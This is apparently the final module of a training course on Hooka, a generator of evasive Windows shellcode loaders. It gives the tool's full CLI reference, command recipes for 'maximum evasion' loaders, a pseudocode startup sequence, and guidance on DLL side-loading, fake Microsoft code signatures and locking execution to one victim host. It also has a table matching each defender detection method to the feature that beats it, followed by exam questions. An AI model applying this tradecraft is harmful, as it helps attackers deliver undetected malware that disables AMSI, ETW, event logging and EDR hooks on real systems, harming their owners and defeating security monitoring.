Module 8: CLI Generator & Full Chain
The complete Hooka CLI reference, real-world loader recipes, end-to-end execution flow, and operational tradecraft for the final module.
The Big Picture
Throughout this course you have learned each individual technique: injection methods, syscall gates, unhooking, AMSI/ETW patching, sandbox detection, encryption, and the Go library. The Hooka CLI brings them all together into a single command-line tool that generates complete, ready-to-compile loaders. This final module covers the CLI in depth, walks through real-world loader recipes, explains the end-to-end generation pipeline, and closes with operational tradecraft and a full course recap.
Installation
Bash# Clone the repository
git clone https://github.com/D3Ext/Hooka
cd Hooka
# Build (outputs to build/ directory)
make
# The hooka binary is now at build/hooka
Build Output
The make target compiles the Hooka CLI tool and places it in the build/ directory. The binary itself is a standard Go executable that runs on Linux (the primary build environment for cross-compiling Windows loaders). It uses GOOS=windows GOARCH=amd64 flags internally when generating loaders.
Input Sources
Hooka accepts shellcode from multiple input formats via the -i flag:
| Input Type | Extension / Pattern | How It's Handled |
|---|---|---|
| Raw shellcode | .bin | Read directly as bytes — no conversion needed |
| PE executable | .exe | Converted to shellcode using PE-to-shellcode techniques (similar to Donut) |
| DLL | .dll | Converted via sRDI (ConvertDllToShellcode) to reflective shellcode |
| Remote URL | http://... | Fetched at build time and processed based on content type |
Output Formats
| Flag | Format | Description |
|---|---|---|
-f exe (default) | EXE | Standard Windows executable — double-click or command-line execution |
-f dll | DLL | Windows DLL with entry point — loaded via rundll32 or side-loading |
Complete CLI Flag Reference
| Flag | Long Form | Description |
|---|---|---|
-i | --input | Input file path or URL (required) |
-o | --output | Output file path (default: loader.exe) |
-f | --format | Output format: exe or dll |
--exec | Injection technique (SuspendedProcess, ProcessHollowing, NtCreateThreadEx, EtwpCreateEtwThread, NtQueueApcThreadEx, NoRwx) | |
--unhook | Unhooking method: classic, full, or peruns | |
--amsi | Enable AMSI patching | |
--etw | Enable ETW patching | |
--halo | Use Halo's Gate for syscall resolution | |
--sandbox | Enable all 8 sandbox detection checks | |
--sleep | Add custom sleep at startup | |
--acg | Enable Arbitrary Code Guard | |
--blockdlls | Block non-Microsoft DLLs | |
--phantom | Enable Phant0m Event Log suppression | |
--enc | Encryption: aes, 3des, rc4, or xor | |
--sgn | Apply Shikata Ga Nai polymorphic encoding | |
--strings | Caesar cipher string obfuscation | |
-r | --rand | Randomize variable and function names |
--compress | UPX compression on output binary | |
-c | --cert | PFX certificate for code signing |
-d | --domain | Domain for fake code signature |
--proc | Target process name for injection (default: notepad.exe) | |
--user | Restrict execution to specific username | |
--computername | Restrict execution to specific hostname | |
--calc | Use built-in calc.exe shellcode for testing |
Building Loaders for Real Scenarios
Scenario 1: Basic Loader
Minimal Configuration
Bashhooka -i shellcode.bin -o loader.exe
Uses default settings: SuspendedProcess injection, no encryption, no evasion. Good for testing in controlled environments where no AV/EDR is present.
Scenario 2: Process Hollowing with Unhooking
Targeted Injection with EDR Bypass
Bashhooka -i sc.bin -o loader.exe \
--exec ProcessHollowing \
--unhook full \
--amsi --etw
Hollows a target process (default: notepad.exe), replaces its memory with shellcode, and resumes execution. Full NTDLL unhooking removes all EDR hooks before injection. AMSI and ETW patching disable the two primary telemetry channels.
Scenario 3: Remote Fetch + DLL Output
Stageless Network-Fetched Loader
Bashhooka -i http://192.168.1.126/sc.bin -o loader.dll \
-f dll --sandbox --enc aes
Fetches shellcode from a remote server at build time, encrypts it with AES, embeds the ciphertext into a DLL. The DLL performs sandbox detection before decrypting and injecting. Output can be loaded via rundll32 or DLL side-loading.
Scenario 4: Maximum Evasion
Every Evasion Technique Enabled
Bashhooka -i sc.bin -o loader.exe \
--exec NtCreateThreadEx \
--unhook peruns \
--halo \
--amsi --etw \
--sandbox \
--blockdlls \
--phantom \
--sleep \
--acg \
--enc aes \
--sgn \
--strings \
-r \
--compress \
-d www.microsoft.com
This generates a loader with: custom sleep delay, eight sandbox checks, AMSI and ETW patching, Perun's Fart NTDLL unhooking, Halo's Gate syscall resolution, DLL blocking, ACG Guard, Event Log suppression, AES encryption with SGN encoding, Caesar cipher string obfuscation, random naming, UPX compression, and a fake Microsoft code signature.
The --calc Test Mode
Safe Testing Without Real Shellcode
Bash# Generate a loader that opens calc.exe (safe test payload)
hooka --calc -o test_loader.exe --exec NtCreateThreadEx --sandbox
The --calc flag uses a built-in shellcode payload that launches calc.exe. This allows you to test all evasion techniques, injection methods, and sandbox detection without needing actual malicious shellcode. If calc.exe opens on the target, your loader chain works correctly.
End-to-End Generation Pipeline
When you run the Hooka CLI, the following pipeline executes internally:
CLI Generation Pipeline
CLI flags
.bin/.exe/.dll/URL
PE/DLL to shellcode
AES/3DES/RC4/XOR
Source code
Strings/names
GOOS=windows
SGN/UPX/Sign
Pipeline Steps in Detail
- Parse Arguments: The CLI parses all flags and validates the configuration (incompatible options, missing dependencies like sgn or UPX).
- Read Input: Shellcode is read from the specified file or fetched from a URL. For .exe and .dll inputs, conversion to shellcode format occurs.
- Convert: PE executables are converted via PE-to-shellcode techniques. DLLs are converted via sRDI. Raw .bin files are used directly.
- Encrypt: The shellcode is encrypted with the selected algorithm. A random key is generated. Both ciphertext and key are prepared for embedding.
- Generate Go Source: Hooka generates a complete Go source file containing: the encrypted shellcode as a byte array, the decryption key, the decryption function, all selected evasion techniques in the correct order, and the injection method.
- Obfuscate: If
--stringsis enabled, string literals are Caesar-shifted. If-ris enabled, all identifiers are randomized. - Compile: The Go source is cross-compiled with
GOOS=windows GOARCH=amd64and linker flags-s -w -H=windowsgui(strip symbols, no console window). - Post-Process: Optional SGN encoding, UPX compression, and code signing are applied to the compiled binary.
What the Generated Code Looks Like
The generated Go source follows a strict execution order designed for maximum evasion. Here is the startup sequence that every generated loader follows:
Generated Loader Startup Sequence
Time delay
AutoCheck()
PatchAmsi()
PatchEtw()
Clean NTDLL
Shellcode
Execute payload
Go// Pseudocode of generated loader structure
func main() {
// Phase 1: Timing evasion
hooka.Sleep() // if --sleep
// Phase 2: Environment validation
sandbox, _ := hooka.AutoCheck() // if --sandbox
if sandbox { os.Exit(0) }
// Phase 3: Defense neutralization
hooka.PatchAmsi() // if --amsi
hooka.PatchEtw() // if --etw
hooka.PerunsUnhook() // if --unhook peruns
// Phase 4: Process hardening
hooka.EnableACG() // if --acg
hooka.BlockDLLs() // if --blockdlls
pid, _ := hooka.GetEventLogPid() // if --phantom
hooka.Phant0m(pid) // if --phantom
// Phase 5: Payload preparation
key := []byte{...} // Embedded decryption key
enc := []byte{...} // Embedded encrypted shellcode
sc := decrypt(enc, key) // Runtime decryption
// Phase 6: Execution
hooka.NtCreateThreadExHalos(sc) // Selected injection method
}
DLL Output Considerations
DLL Format (-f dll)
When generating a DLL, the loader logic executes in the DLL's entry point (DllMain) when DLL_PROCESS_ATTACH is received. This means the shellcode runs automatically when the DLL is loaded by any process.
- rundll32 execution:
rundll32.exe loader.dll,DllMain - DLL side-loading: place the DLL where a legitimate application will load it
- Export functions: the generated DLL exports standard functions expected by common side-loading targets
DLL format is preferred for side-loading scenarios and when you need the loader to execute within the context of another (legitimate) process.
Code Signing Workflow
Using Real and Fake Certificates
Bash# Option 1: Sign with a real PFX certificate
hooka -i sc.bin -o loader.exe -c /path/to/cert.pfx
# Option 2: Generate a fake signature with a domain name
hooka -i sc.bin -o loader.exe -d www.microsoft.com
# Combine both: sign with real cert AND compress
hooka -i sc.bin -o loader.exe -c cert.pfx --compress
Hooka uses osslsigncode internally for signing. For fake signatures (-d), it generates a self-signed certificate with the specified Common Name, signs the binary, and embeds the certificate. The signature will appear in file properties but will not pass chain-of-trust verification.
Detection Surface Analysis
Understanding what defenders look for helps you make informed decisions about which techniques to combine.
What Defenders Detect
| Detection Vector | What They Look For | Hooka's Counter |
|---|---|---|
| Static signatures | Known byte patterns in the binary | Encryption + SGN encoding |
| String analysis | API names, DLL names, suspicious strings | --strings Caesar cipher |
| Symbol analysis | Function/variable names in Go binaries | -r random naming + -s -w linker flags |
| Import table | Suspicious Win32 API imports | Halo's Gate syscalls bypass import table |
| Entropy analysis | High-entropy sections (encrypted data) | Difficult to counter — inherent to encryption |
| Behavioral analysis | API call sequences in sandbox | --sandbox detection + --sleep |
| Memory scanning | Plaintext shellcode in memory post-decryption | ACG prevents post-injection scanning hooks |
| Event logs | Process creation, privilege escalation events | --phantom Event Log suppression |
| EDR hooks | Inline hooks on NT functions | --unhook NTDLL restoration |
| Go binary fingerprint | Go runtime structures, GC metadata | UPX compression alters binary structure |
Operational Tradecraft
Target Process Selection
The --proc flag specifies which process to target for injection techniques that require a host process (SuspendedProcess, ProcessHollowing, QueueUserApc, CreateRemoteThread). Default is notepad.exe.
- Choose common processes:
svchost.exe,RuntimeBroker.exe,explorer.exeblend into normal system activity - Match architecture: target must be x64 for x64 shellcode
- Avoid protected processes: some system processes (csrss.exe, lsass.exe) have additional protections
Username & Hostname Targeting
Bash# Lock execution to a specific target
hooka -i sc.bin -o loader.exe \
--user jsmith \
--computername CORP-WS-042 \
--sandbox
If the loader lands on an analyst's machine or a different workstation, it exits silently without revealing any behavior. Combined with sandbox detection, this provides strong environment validation.
When to Use CLI vs Go Library
| Use Case | Best Tool | Why |
|---|---|---|
| Quick loader for a known payload | CLI | Single command, immediate output |
| Testing injection techniques | CLI + --calc | Safe testing with calc.exe payload |
| Custom encryption chains | Library | Combine multiple crypto algorithms |
| C2 framework integration | Library | Programmatic control, dynamic configuration |
| Conditional execution logic | Library | If-else branches, fallback strategies |
| Batch loader generation | CLI (scripted) | Loop through flag combinations in bash |
| Novel injection techniques | Library | Combine Hooka functions with custom code |
Prior Art & Evolution
Hooka builds on a lineage of Go-based shellcode loaders, each advancing the state of evasion:
The Loader Family Tree
| Tool | Author | Key Innovation |
|---|---|---|
| BokuLoader | boku7 | Early reflective loader with syscalls |
| ScareCrow | Optiv | EDR-aware loader with DLL side-loading and code signing |
| Freeze | Optiv | Suspended process injection with ETW/AMSI patching |
| Shhhloader | icyguider | Syscall-based loader with multiple injection methods |
| Hooka | D3Ext | Combined all techniques + importable Go library + CLI generator with 6 CLI injection methods (10 in library), 3 gate techniques, 3 unhooking methods, 4 encryption algorithms, and 8 sandbox checks |
Hooka's key differentiator is its dual nature: a complete CLI tool and an importable Go library. Previous tools were CLI-only, requiring users to modify source code for customization. Hooka's library approach allows building entirely custom tooling while leveraging battle-tested evasion primitives.
Course Summary: All 8 Modules
What You've Learned
| Module | Topic | Key Takeaway |
|---|---|---|
| 1 | Introduction to Shellcode Loaders | Loader lifecycle, EDR detection layers, tool landscape |
| 2 | Injection Techniques | 8 injection methods from SuspendedProcess to NoRwx |
| 3 | Syscalls & Gate Techniques | Direct syscalls, Hell's/Halo's/Tartarus' Gate, API hashing |
| 4 | Unhooking & Patching | 3 unhooking methods, AMSI patching (2), ETW patching (2) |
| 5 | Sandbox Detection & Process Protection | 8 sandbox checks, ACG, BlockDLLs, Phant0m, custom sleep |
| 6 | Encryption & Obfuscation | AES/3DES/RC4/XOR, SGN, string obfuscation, code signing |
| 7 | The Hooka Go Library | 40+ functions, custom loader building, sRDI, API reference |
| 8 | CLI Generator & Full Chain | Complete CLI reference, generation pipeline, tradecraft |
Final Exam: CLI Generator & Full Chain
Q1: What is the correct execution order in a generated Hooka loader?
Q2: What does the --calc flag do?
Q3: Why does Hooka cross-compile with -H=windowsgui?
Q4: What is Hooka's primary differentiator compared to ScareCrow, Freeze, and Shhhloader?